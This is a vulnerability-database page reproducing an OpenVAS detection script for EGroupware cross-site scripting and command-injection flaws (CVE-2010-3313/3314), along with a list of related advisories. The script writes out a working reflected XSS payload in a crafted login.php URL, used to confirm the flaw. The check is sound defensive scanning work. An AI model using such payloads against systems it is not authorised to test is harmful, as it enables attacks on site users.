EGroupware Multiple Vulnerabilities (Sep 2010) - Active Check
🗓️ 24 Sep 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType
openvas🔗 plugins.openvas.org👁 29 Views
| Reporter | Title | Published | Views | Family All 32 |
|---|---|---|---|---|
| eGroupWare < 1.6.003 Mutiple Vulnerabilities | 18 Mar 201000:00 | – | nessus | |
| Debian DSA-2013-1 : egroupware - several vulnerabilities | 15 Mar 201000:00 | – | nessus | |
| eGroupWare spellchecker.php Arbitrary Shell Command Execution | 10 Mar 201000:00 | – | nessus | |
| GLSA-201412-10 : Multiple packages, Multiple vulnerabilities fixed in 2012 | 15 Dec 201400:00 | – | nessus | |
| CVE-2010-3313 | 22 Sep 201000:00 | – | attackerkb | |
| CVE-2010-3313 | 16 Mar 201000:00 | – | circl | |
| CVE-2010-3314 | 16 Mar 201000:00 | – | circl | |
| CVE-2010-3313 | 22 Sep 201018:00 | – | cve | |
| CVE-2010-3314 | 22 Sep 201018:00 | – | cve | |
| CVE-2010-3313 | 22 Sep 201018:00 | – | cvelist |
10
| Source | Link |
|---|---|
| egroupware | www.egroupware.org/news |
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:egroupware:egroupware";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100824");
script_version("2024-07-12T15:38:44+0000");
script_tag(name:"last_modification", value:"2024-07-12 15:38:44 +0000 (Fri, 12 Jul 2024)");
script_tag(name:"creation_date", value:"2010-09-24 14:46:08 +0200 (Fri, 24 Sep 2010)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
script_cve_id("CVE-2010-3313", "CVE-2010-3314");
script_name("EGroupware Multiple Vulnerabilities (Sep 2010) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2010 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_egroupware_http_detect.nasl");
script_require_ports("Services/www", 443);
script_mandatory_keys("egroupware/http/detected");
script_tag(name:"summary", value:"EGroupware is prone to multiple vulnerabilities.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"insight", value:"The following vulnerabilities exist:
- Cross-site scripting (XSS) vulnerability in login.php
- Arbitrary command execution via shell metacharacters");
script_tag(name:"solution", value:"Vendor updates are available. Please see the references for
details.");
script_xref(name:"URL", value:"http://www.egroupware.org/news?item=93");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
url = dir + '/login.php?lang="%20style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px"%20onMouseOver="alert(%27vt-xss-test%27)';
if (http_vuln_check(port: port, url: url, pattern: "onMouseOver=.alert\('vt-xss-test')", check_header: TRUE)) {
report = http_report_vuln_url(port: port, url: url);
security_message(port: port, data: report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2024 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 27.5
EPSS0.08501